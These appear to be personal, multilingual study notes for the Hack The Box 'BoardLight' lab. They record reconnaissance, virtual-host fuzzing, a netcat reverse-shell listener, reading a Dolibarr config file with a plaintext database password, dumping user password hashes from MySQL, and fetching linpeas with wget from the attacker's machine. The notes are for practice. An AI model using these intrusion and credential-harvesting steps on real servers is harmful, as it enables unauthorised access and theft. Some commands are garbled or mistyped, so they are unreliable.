BoardLight {Bypass; DevTools; Gobuster & MSFconsole vhost, Lokal DNS; NetCat, MySQL; SSH, Linpeas}
BoardLight {Ping; Nmap; Dirsearch, “Bypass”; Burp Suite, “DevTools”; Gobuster & MSFconsole vhost, Lokal DNS /etc/hosts; Reverse Shell Attack NetCat (nc)/python, Commands/Files/”Setuid-Bit/FileCapabilities”, Mysql -u -p; SSH (ping -c2 8.8.8.8), Linpeas (python -m http.server 9090, wget http://IP tun0:9090/linpeas.sh), Nano exp.py (./exp.py)}
__________
За’bypass’ить?
Chrome Entwickler Tools (Devtools) für Webdesign – Tutorial
Devtools для тестировщика | devtools QA | применение на практике:
Файлы Dolibarr (conf.php):
Enterprise resource planning (ERP)
Customer relationship management (CRM)
Google: dolibar configuration file
https://wiki.dolibarr.org/index.php?title=Configuration_file
У разных операционных систем различаются и файловые системы:
Файловая система определяет, как будут организованы кластеры в памяти устройства.
Setuid, Setgid, and the Sticky Bit?
https://www.cbtnuggets.com/blog/technology/system-admin/linux-file-permissions-understanding-setuid-setgid-and-the-sticky-bit
https://unixwork.de/blog/article?id=46f
How to Manage Linux File Capabilities:
Возможность/Capabilities — это отдельная и независимая привилегия, которая може
использоваться процессом для обхода определенных проверок разрешений.
https://www.howtoforge.com/how-to-manage-linux-file-capabilities/
Reverse Shell – создание страницы в ручную?
REVERSE или BIND shell? В чем разница?Какой выбрать?:
https://codeby.net/threads/reverse-ili-bind-shell-v-chem-raznica-kakoj-vybrat.58608/
Что такое Netcat? Bind Shell и Reverse Shell в действии:
https://habr.com/ru/articles/657613/
Metasploit (msfconsole) exploit and payload?
__________
HTB BoardLight Writeup:
https://iven.in/posts/BoardLight/
[HTB Writeup] BoardLight – Season 5:
nmap -sV -sC 10.10.11.11
http://10.10.11.11/contact.php
ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -u http://10.10.11.11/FUZZ -c
-c – Раскрасить выходные данные. (по умолчанию: false)
ffuf -w subdomains-top1million-5000.txt -u http://board.htb/ -H “host:FUZZ.board.htb” -H “Content-Type: application/x-www-form-urlencoded” -fs 15949 -c
crm [Status: 200, Size: 6360, Words: 397, Lines: 150, Duration: 57ms]
-fs – Фильтрует размер HTTP-ответа. Список размеров и диапазонов
searchsploit Dolibarr 17
https://www.exploit-db.com/
SearchSploit – The Manual
https://www.exploit-db.com/searchsploit
Google: Dolibarr 17.0.0 exploit
Google: dolibarr default credentials
Google: dolibar configuration file (conf.php)
find * | grep conf.php
nmap 10.10.11.11 -p3306
mysql –help
$ mysql
SHOW DATABASES
SELECT dolibarr;
use djlibarr;
show tables;
select * from llx_user
exit
ssh larissa@10.10.11.11 -p 22
larissa@boardlight:~$ groups
larissa adm
cd Downloads/
wget 10.10.tun0:3333/linpeas.sh
ls -la
Google: GTFOBins
Google: enlightenment suid exploit
BoardLight | HackTheBox | #cve-2023-30253:
sudo openvpn ../lab_An0nyR0y.ovpn
Wappalyzer (плагин) – шпионить за чужими веб-сайтами и людми на них; посмотреть из чего сделан сайт. {анализ технической стороны веб-сайта, используемые технологии этой страницей}
ifconfig tun0 | grep inet | head -n 1
ffuf -u “http://board.htb” -H “Host: FUZZ.board.htb”
-w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt
исключаем 15949
ffuf -u “http://board.htb” -H “Host: FUZZ.board.htb”
-w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -fs 15949
www-data@boardlight:~/html/crm.board.htb/htdocs/conf$ python3 -c ‘import pty:pty.spawn(“/bin/bash”)’
^c
(kali kali)-[~/Documents/HTB/BoardLight]
$ stty raw -echo ; fg
[1] +continued nc -lvnp 7777
www-data@boardlight:~/html/crm.board.htb/htdocs/conf$ cat conf.php
echo ‘dilibarrowner:serverfun2$2023!!’ | creds.txt
exit – выход из Split Terminal
mysql -h localhost -P 3306 -u dilibarrowner -p dolibarr
serverfun2$2023!!
mysql} – мы получили форму mysql
show databases; – слушаем 3 интерфейс
use dolibarr;
show tables;
desc llx_user;
select admin, login, pass, pass_crypted, pass_encoding, firstname, lastname from llx_user;
exit – выход из формы mysql
larissa@boardlight:~$ crontab -l
find / -type f -perm -u=s 2}/dev/null
enlightenment suid exploit
mv ~/Downloads/51180.txt exploit.sh
rm exploit.sh
by OffSec Kali Linux
linux dns server
Что такое ХТБ? и зачем жать на кнопки?